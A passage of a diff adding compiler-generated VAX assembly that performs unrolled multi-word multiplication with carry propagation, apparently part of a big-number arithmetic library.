+	cmpl	r10,r2
+	bgequ	noname.172
+	incl	r9
+noname.172:
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-524(fp)
+	bicl3	#-65536,r2,-528(fp)
+	mull3	r0,-524(fp),-516(fp)
+	mull2	r3,-524(fp)
+	mull3	r3,-528(fp),-520(fp)
+	mull2	r0,-528(fp)
+	addl3	-516(fp),-520(fp),r0
+	bicl3	#0,r0,-516(fp)
+	cmpl	-516(fp),-520(fp)
+	bgequ	noname.173
+	addl2	#65536,-528(fp)
+noname.173:
+	movzwl	-514(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-528(fp)
+	bicl3	#-65536,-516(fp),r0
+	ashl	#16,r0,-520(fp)
+	addl3	-520(fp),-524(fp),r0
+	bicl3	#0,r0,-524(fp)
+	cmpl	-524(fp),-520(fp)
+	bgequ	noname.174
+	incl	-528(fp)
+noname.174:
+	movl	-524(fp),r1
+	movl	-528(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.175
+	incl	r2
+noname.175:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.176
+	incl	r9
+noname.176:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-540(fp)
+	bicl3	#-65536,r2,-544(fp)
+	mull3	r0,-540(fp),-532(fp)
+	mull2	r3,-540(fp)
+	mull3	r3,-544(fp),-536(fp)
+	mull2	r0,-544(fp)
+	addl3	-532(fp),-536(fp),r0
+	bicl3	#0,r0,-532(fp)
+	cmpl	-532(fp),-536(fp)
+	bgequ	noname.177
+	addl2	#65536,-544(fp)
+noname.177:
+	movzwl	-530(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-544(fp)
+	bicl3	#-65536,-532(fp),r0
+	ashl	#16,r0,-536(fp)
+	addl3	-536(fp),-540(fp),r0
+	bicl3	#0,r0,-540(fp)
+	cmpl	-540(fp),-536(fp)
+	bgequ	noname.178
+	incl	-544(fp)
+noname.178:
+	movl	-540(fp),r1
+	movl	-544(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.179
+	incl	r2
+noname.179:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.180
+	incl	r9
+noname.180:
+
+	movzwl	26(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,24(r6),-556(fp)
+	bicl3	#-65536,r2,-560(fp)
+	mull3	r0,-556(fp),-548(fp)
+	mull2	r3,-556(fp)
+	mull3	r3,-560(fp),-552(fp)
+	mull2	r0,-560(fp)
+	addl3	-548(fp),-552(fp),r0
+	bicl3	#0,r0,-548(fp)
+	cmpl	-548(fp),-552(fp)
+	bgequ	noname.181
+	addl2	#65536,-560(fp)
+noname.181:
+	movzwl	-546(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-560(fp)
+	bicl3	#-65536,-548(fp),r0
+	ashl	#16,r0,-552(fp)
+	addl3	-552(fp),-556(fp),r0
+	bicl3	#0,r0,-556(fp)
+	cmpl	-556(fp),-552(fp)
+	bgequ	noname.182
+	incl	-560(fp)
+noname.182:
+	movl	-556(fp),r1
+	movl	-560(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.183
+	incl	r2
+noname.183:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.184
+	incl	r9
+noname.184:
+
+	movzwl	30(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,28(r6),-572(fp)
+	bicl3	#-65536,r2,-576(fp)
+	mull3	r0,-572(fp),-564(fp)
+	mull2	r3,-572(fp)
+	mull3	r3,-576(fp),-568(fp)
+	mull2	r0,-576(fp)
+	addl3	-564(fp),-568(fp),r0
+	bicl3	#0,r0,-564(fp)
+	cmpl	-564(fp),-568(fp)
+	bgequ	noname.185
+	addl2	#65536,-576(fp)
+noname.185:
+	movzwl	-562(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-576(fp)
+	bicl3	#-65536,-564(fp),r0
+	ashl	#16,r0,-568(fp)
+	addl3	-568(fp),-572(fp),r0
+	bicl3	#0,r0,-572(fp)
+	cmpl	-572(fp),-568(fp)
+	bgequ	noname.186
+	incl	-576(fp)
+noname.186:
+	movl	-572(fp),r1
+	movl	-576(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.187
+	incl	r2
+noname.187:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.188
+	incl	r9
+noname.188:
+
+	movl	r8,28(r11)
+
+	clrl	r8
+
+	movzwl	30(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,28(r6),-588(fp)
+	bicl3	#-65536,r2,-592(fp)
+	mull3	r0,-588(fp),-580(fp)
+	mull2	r3,-588(fp)
+	mull3	r3,-592(fp),-584(fp)
+	mull2	r0,-592(fp)
+	addl3	-580(fp),-584(fp),r0
+	bicl3	#0,r0,-580(fp)
+	cmpl	-580(fp),-584(fp)
+	bgequ	noname.189
+	addl2	#65536,-592(fp)
+noname.189:
+	movzwl	-578(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-592(fp)
+	bicl3	#-65536,-580(fp),r0
+	ashl	#16,r0,-584(fp)
+	addl3	-584(fp),-588(fp),r0
+	bicl3	#0,r0,-588(fp)
+	cmpl	-588(fp),-584(fp)
+	bgequ	noname.190
+	incl	-592(fp)
+noname.190:
+	movl	-588(fp),r1
+	movl	-592(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.191
+	incl	r2
+noname.191:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.192
+	incl	r8
+noname.192:
+
+	movzwl	26(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,24(r6),-604(fp)
+	bicl3	#-65536,r2,-608(fp)
+	mull3	r0,-604(fp),-596(fp)
+	mull2	r3,-604(fp)
+	mull3	r3,-608(fp),-600(fp)
+	mull2	r0,-608(fp)
+	addl3	-596(fp),-600(fp),r0
+	bicl3	#0,r0,-596(fp)
+	cmpl	-596(fp),-600(fp)
+	bgequ	noname.193
+	addl2	#65536,-608(fp)
+noname.193:
+	movzwl	-594(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-608(fp)
+	bicl3	#-65536,-596(fp),r0
+	ashl	#16,r0,-600(fp)
+	addl3	-600(fp),-604(fp),r0
+	bicl3	#0,r0,-604(fp)
+	cmpl	-604(fp),-600(fp)
+	bgequ	noname.194
+	incl	-608(fp)
+noname.194:
+	movl	-604(fp),r1
+	movl	-608(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.195
+	incl	r2
+noname.195:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.196
+	incl	r8
+noname.196:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-620(fp)
+	bicl3	#-65536,r2,-624(fp)
+	mull3	r0,-620(fp),-612(fp)
+	mull2	r3,-620(fp)
+	mull3	r3,-624(fp),-616(fp)
+	mull2	r0,-624(fp)
+	addl3	-612(fp),-616(fp),r0
+	bicl3	#0,r0,-612(fp)
+	cmpl	-612(fp),-616(fp)
+	bgequ	noname.197
+	addl2	#65536,-624(fp)
+noname.197:
+	movzwl	-610(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-624(fp)
+	bicl3	#-65536,-612(fp),r0
+	ashl	#16,r0,-616(fp)
+	addl3	-616(fp),-620(fp),r0
+	bicl3	#0,r0,-620(fp)
+	cmpl	-620(fp),-616(fp)
+	bgequ	noname.198
+	incl	-624(fp)
+noname.198:
+	movl	-620(fp),r1
+	movl	-624(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.199
+	incl	r2
+noname.199:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.200
+	incl	r8
+noname.200:
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-636(fp)
+	bicl3	#-65536,r2,-640(fp)
+	mull3	r0,-636(fp),-628(fp)
+	mull2	r3,-636(fp)
+	mull3	r3,-640(fp),-632(fp)
+	mull2	r0,-640(fp)
+	addl3	-628(fp),-632(fp),r0
+	bicl3	#0,r0,-628(fp)
+	cmpl	-628(fp),-632(fp)
+	bgequ	noname.201
+	addl2	#65536,-640(fp)
+noname.201:
+	movzwl	-626(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-640(fp)
+	bicl3	#-65536,-628(fp),r0
+	ashl	#16,r0,-632(fp)
+	addl3	-632(fp),-636(fp),r0
+	bicl3	#0,r0,-636(fp)
+	cmpl	-636(fp),-632(fp)
+	bgequ	noname.202
+	incl	-640(fp)
+noname.202:
+	movl	-636(fp),r1
+	movl	-640(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.203
+	incl	r2
+noname.203:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.204
+	incl	r8
+noname.204:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,20(r7),r3
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-652(fp)
+	bicl3	#-65536,r2,-656(fp)
+	mull3	r0,-652(fp),-644(fp)
+	mull2	r3,-652(fp)
+	mull3	r3,-656(fp),-648(fp)
+	mull2	r0,-656(fp)
+	addl3	-644(fp),-648(fp),r0
+	bicl3	#0,r0,-644(fp)
+	cmpl	-644(fp),-648(fp)
+	bgequ	noname.205
+	addl2	#65536,-656(fp)
+noname.205:
+	movzwl	-642(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-656(fp)
+	bicl3	#-65536,-644(fp),r0
+	ashl	#16,r0,-648(fp)
+	addl3	-648(fp),-652(fp),r0
+	bicl3	#0,r0,-652(fp)
+	cmpl	-652(fp),-648(fp)
+	bgequ	noname.206
+	incl	-656(fp)
+noname.206:
+	movl	-652(fp),r1
+	movl	-656(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.207
+	incl	r2
+noname.207:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.208
+	incl	r8
+noname.208:
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-668(fp)
+	bicl3	#-65536,r2,-672(fp)
+	mull3	r0,-668(fp),-660(fp)
+	mull2	r3,-668(fp)
+	mull3	r3,-672(fp),-664(fp)
+	mull2	r0,-672(fp)
+	addl3	-660(fp),-664(fp),r0
+	bicl3	#0,r0,-660(fp)
+	cmpl	-660(fp),-664(fp)
+	bgequ	noname.209
+	addl2	#65536,-672(fp)
+noname.209:
+	movzwl	-658(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-672(fp)
+	bicl3	#-65536,-660(fp),r0
+	ashl	#16,r0,-664(fp)
+	addl3	-664(fp),-668(fp),r0
+	bicl3	#0,r0,-668(fp)
+	cmpl	-668(fp),-664(fp)
+	bgequ	noname.210
+	incl	-672(fp)
+noname.210:
+	movl	-668(fp),r1
+	movl	-672(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.211
+	incl	r2
+noname.211:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.212
+	incl	r8
+noname.212:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,28(r7),r3
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-684(fp)
+	bicl3	#-65536,r2,-688(fp)
+	mull3	r0,-684(fp),-676(fp)
+	mull2	r3,-684(fp)
+	mull3	r3,-688(fp),-680(fp)
+	mull2	r0,-688(fp)
+	addl3	-676(fp),-680(fp),r0
+	bicl3	#0,r0,-676(fp)
+	cmpl	-676(fp),-680(fp)
+	bgequ	noname.213
+	addl2	#65536,-688(fp)
+noname.213:
+	movzwl	-674(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-688(fp)
+	bicl3	#-65536,-676(fp),r0
+	ashl	#16,r0,-680(fp)
+	addl3	-680(fp),-684(fp),r0
+	bicl3	#0,r0,-684(fp)
+	cmpl	-684(fp),-680(fp)
+	bgequ	noname.214
+	incl	-688(fp)
+noname.214:
+	movl	-684(fp),r1
+	movl	-688(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.215
+	incl	r2
+noname.215:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.216
+	incl	r8
+noname.216:
+
+	movl	r10,32(r11)
+
+	clrl	r10
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,28(r7),r3
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-700(fp)
+	bicl3	#-65536,r2,-704(fp)
+	mull3	r0,-700(fp),-692(fp)
+	mull2	r3,-700(fp)
+	mull3	r3,-704(fp),-696(fp)
+	mull2	r0,-704(fp)
+	addl3	-692(fp),-696(fp),r0
+	bicl3	#0,r0,-692(fp)
+	cmpl	-692(fp),-696(fp)
+	bgequ	noname.217
+	addl2	#65536,-704(fp)
+noname.217:
+	movzwl	-690(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-704(fp)
+	bicl3	#-65536,-692(fp),r0
+	ashl	#16,r0,-696(fp)
+	addl3	-696(fp),-700(fp),r0
+	bicl3	#0,r0,-700(fp)
+	cmpl	-700(fp),-696(fp)
+	bgequ	noname.218
+	incl	-704(fp)
+noname.218:
+	movl	-700(fp),r1
+	movl	-704(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.219
+	incl	r2
+noname.219:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.220
+	incl	r10
+noname.220:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-716(fp)
+	bicl3	#-65536,r2,-720(fp)
+	mull3	r0,-716(fp),-708(fp)
+	mull2	r3,-716(fp)
+	mull3	r3,-720(fp),-712(fp)
+	mull2	r0,-720(fp)
+	addl3	-708(fp),-712(fp),r0
+	bicl3	#0,r0,-708(fp)
+	cmpl	-708(fp),-712(fp)
+	bgequ	noname.221
+	addl2	#65536,-720(fp)
+noname.221:
+	movzwl	-706(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-720(fp)
+	bicl3	#-65536,-708(fp),r0
+	ashl	#16,r0,-712(fp)
+	addl3	-712(fp),-716(fp),r0
+	bicl3	#0,r0,-716(fp)
+	cmpl	-716(fp),-712(fp)
+	bgequ	noname.222
+	incl	-720(fp)
+noname.222:
+	movl	-716(fp),r1
+	movl	-720(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.223
+	incl	r2
+noname.223:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.224
+	incl	r10
+noname.224:
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,20(r7),r3
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-732(fp)
+	bicl3	#-65536,r2,-736(fp)
+	mull3	r0,-732(fp),-724(fp)
+	mull2	r3,-732(fp)
+	mull3	r3,-736(fp),-728(fp)
+	mull2	r0,-736(fp)
+	addl3	-724(fp),-728(fp),r0
+	bicl3	#0,r0,-724(fp)
+	cmpl	-724(fp),-728(fp)
+	bgequ	noname.225
+	addl2	#65536,-736(fp)
+noname.225:
+	movzwl	-722(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-736(fp)
+	bicl3	#-65536,-724(fp),r0
+	ashl	#16,r0,-728(fp)
+	addl3	-728(fp),-732(fp),r0
+	bicl3	#0,r0,-732(fp)
+	cmpl	-732(fp),-728(fp)
+	bgequ	noname.226
+	incl	-736(fp)
+noname.226:
+	movl	-732(fp),r1
+	movl	-736(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.227
+	incl	r2
+noname.227:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.228
+	incl	r10
+noname.228:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-748(fp)
+	bicl3	#-65536,r2,-752(fp)
+	mull3	r0,-748(fp),-740(fp)
+	mull2	r3,-748(fp)
+	mull3	r3,-752(fp),-744(fp)
+	mull2	r0,-752(fp)
+	addl3	-740(fp),-744(fp),r0
+	bicl3	#0,r0,-740(fp)
+	cmpl	-740(fp),-744(fp)
+	bgequ	noname.229
+	addl2	#65536,-752(fp)
+noname.229:
+	movzwl	-738(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-752(fp)
+	bicl3	#-65536,-740(fp),r0
+	ashl	#16,r0,-744(fp)
+	addl3	-744(fp),-748(fp),r0
+	bicl3	#0,r0,-748(fp)
+	cmpl	-748(fp),-744(fp)
+	bgequ	noname.230
+	incl	-752(fp)
+noname.230:
+	movl	-748(fp),r1
+	movl	-752(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.231
+	incl	r2
+noname.231:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.232
+	incl	r10
+noname.232:
+
+	movzwl	26(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,24(r6),-764(fp)
+	bicl3	#-65536,r2,-768(fp)
+	mull3	r0,-764(fp),-756(fp)
+	mull2	r3,-764(fp)
+	mull3	r3,-768(fp),-760(fp)
+	mull2	r0,-768(fp)
+	addl3	-756(fp),-760(fp),r0
+	bicl3	#0,r0,-756(fp)
+	cmpl	-756(fp),-760(fp)
+	bgequ	noname.233
+	addl2	#65536,-768(fp)
+noname.233:
+	movzwl	-754(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-768(fp)
+	bicl3	#-65536,-756(fp),r0
+	ashl	#16,r0,-760(fp)
+	addl3	-760(fp),-764(fp),r0
+	bicl3	#0,r0,-764(fp)
+	cmpl	-764(fp),-760(fp)
+	bgequ	noname.234
+	incl	-768(fp)
+noname.234:
+	movl	-764(fp),r1
+	movl	-768(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.235
+	incl	r2
+noname.235:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.236
+	incl	r10
+noname.236:
+
+	bicl3	#-65536,28(r6),r3
+	movzwl	30(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r7),r2
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-772(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-776(fp)
+	mull2	r0,r4
+	addl3	-772(fp),-776(fp),r0
+	bicl3	#0,r0,-772(fp)
+	cmpl	-772(fp),-776(fp)
+	bgequ	noname.237
+	addl2	#65536,r4
+noname.237:
+	movzwl	-770(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-772(fp),r0
+	ashl	#16,r0,-776(fp)
+	addl2	-776(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-776(fp)
+	bgequ	noname.238
+	incl	r4
+noname.238:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.239
+	incl	r2
+noname.239:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.240
+	incl	r10
+noname.240:
+
+	movl	r9,36(r11)
+
+	clrl	r9
+
+	bicl3	#-65536,28(r6),r3
+	movzwl	30(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r7),r2
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-780(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-784(fp)
+	mull2	r0,r4
+	addl3	-780(fp),-784(fp),r0
+	bicl3	#0,r0,-780(fp)
+	cmpl	-780(fp),-784(fp)
+	bgequ	noname.241
+	addl2	#65536,r4
+noname.241:
+	movzwl	-778(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-780(fp),r0
+	ashl	#16,r0,-784(fp)
+	addl2	-784(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-784(fp)
+	bgequ	noname.242
+	incl	r4
+noname.242:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.243
+	incl	r2
+noname.243:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.244
+	incl	r9
+noname.244:
+
+	bicl3	#-65536,24(r6),r3
+	movzwl	26(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r7),r2
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-788(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-792(fp)
+	mull2	r0,r4
+	addl3	-788(fp),-792(fp),r0
+	bicl3	#0,r0,-788(fp)
+	cmpl	-788(fp),-792(fp)
+	bgequ	noname.245
+	addl2	#65536,r4
+noname.245:
+	movzwl	-786(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-788(fp),r0
+	ashl	#16,r0,-792(fp)
+	addl2	-792(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-792(fp)
+	bgequ	noname.246
+	incl	r4
+noname.246:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.247
+	incl	r2
+noname.247:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.248
+	incl	r9
+noname.248:
+
+	bicl3	#-65536,20(r6),r3
+	movzwl	22(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r7),r2
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-796(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-800(fp)
+	mull2	r0,r4
+	addl3	-796(fp),-800(fp),r0
+	bicl3	#0,r0,-796(fp)
+	cmpl	-796(fp),-800(fp)
+	bgequ	noname.249
+	addl2	#65536,r4
+noname.249:
+	movzwl	-794(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-796(fp),r0
+	ashl	#16,r0,-800(fp)
+	addl2	-800(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-800(fp)
+	bgequ	noname.250
+	incl	r4
+noname.250:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.251
+	incl	r2
+noname.251:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.252
+	incl	r9
+noname.252:
+
+	bicl3	#-65536,16(r6),r3
+	movzwl	18(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,24(r7),r2
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-804(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-808(fp)
+	mull2	r0,r4
+	addl3	-804(fp),-808(fp),r0
+	bicl3	#0,r0,-804(fp)
+	cmpl	-804(fp),-808(fp)
+	bgequ	noname.253
+	addl2	#65536,r4
+noname.253:
+	movzwl	-802(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-804(fp),r0
+	ashl	#16,r0,-808(fp)
+	addl2	-808(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-808(fp)
+	bgequ	noname.254
+	incl	r4
+noname.254:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.255
+	incl	r2
+noname.255:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.256
+	incl	r9
+noname.256:
+
+	bicl3	#-65536,12(r6),r3
+	movzwl	14(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,28(r7),r2
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-812(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-816(fp)
+	mull2	r0,r4
+	addl3	-812(fp),-816(fp),r0
+	bicl3	#0,r0,-812(fp)
+	cmpl	-812(fp),-816(fp)
+	bgequ	noname.257
+	addl2	#65536,r4
+noname.257:
+	movzwl	-810(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-812(fp),r0
+	ashl	#16,r0,-816(fp)
+	addl2	-816(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-816(fp)
+	bgequ	noname.258
+	incl	r4
+noname.258:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.259
+	incl	r2
+noname.259:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.260
+	incl	r9
+noname.260:
+
+	movl	r8,40(r11)
+
+	clrl	r8
+
+	bicl3	#-65536,16(r6),r3
+	movzwl	18(r6),r2
+	bicl3	#-65536,28(r7),r1
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r4
+	bicl3	#-65536,r2,-828(fp)
+	mull3	r0,r4,-820(fp)
+	mull2	r1,r4
+	mull3	r1,-828(fp),-824(fp)
+	mull2	r0,-828(fp)
+	addl3	-820(fp),-824(fp),r0
+	bicl3	#0,r0,-820(fp)
+	cmpl	-820(fp),-824(fp)
+	bgequ	noname.261
+	addl2	#65536,-828(fp)
+noname.261:
+	movzwl	-818(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-828(fp)
+	bicl3	#-65536,-820(fp),r0
+	ashl	#16,r0,-824(fp)
+	addl2	-824(fp),r4
+	bicl2	#0,r4
+	cmpl	r4,-824(fp)
+	bgequ	noname.262
+	incl	-828(fp)
+noname.262:
+	movl	r4,r1
+	movl	-828(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.263
+	incl	r2
+noname.263:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.264
+	incl	r8
+noname.264:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-840(fp)
+	bicl3	#-65536,r2,-844(fp)
+	mull3	r0,-840(fp),-832(fp)
+	mull2	r3,-840(fp)
+	mull3	r3,-844(fp),-836(fp)
+	mull2	r0,-844(fp)
+	addl3	-832(fp),-836(fp),r0
+	bicl3	#0,r0,-832(fp)
+	cmpl	-832(fp),-836(fp)
+	bgequ	noname.265
+	addl2	#65536,-844(fp)
+noname.265:
+	movzwl	-830(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-844(fp)
+	bicl3	#-65536,-832(fp),r0
+	ashl	#16,r0,-836(fp)
+	addl3	-836(fp),-840(fp),r0
+	bicl3	#0,r0,-840(fp)
+	cmpl	-840(fp),-836(fp)
+	bgequ	noname.266
+	incl	-844(fp)
+noname.266:
+	movl	-840(fp),r1
+	movl	-844(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.267
+	incl	r2
+noname.267:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.268
+	incl	r8
+noname.268:
+
+	bicl3	#-65536,24(r6),r3
+	movzwl	26(r6),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r7),r2
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
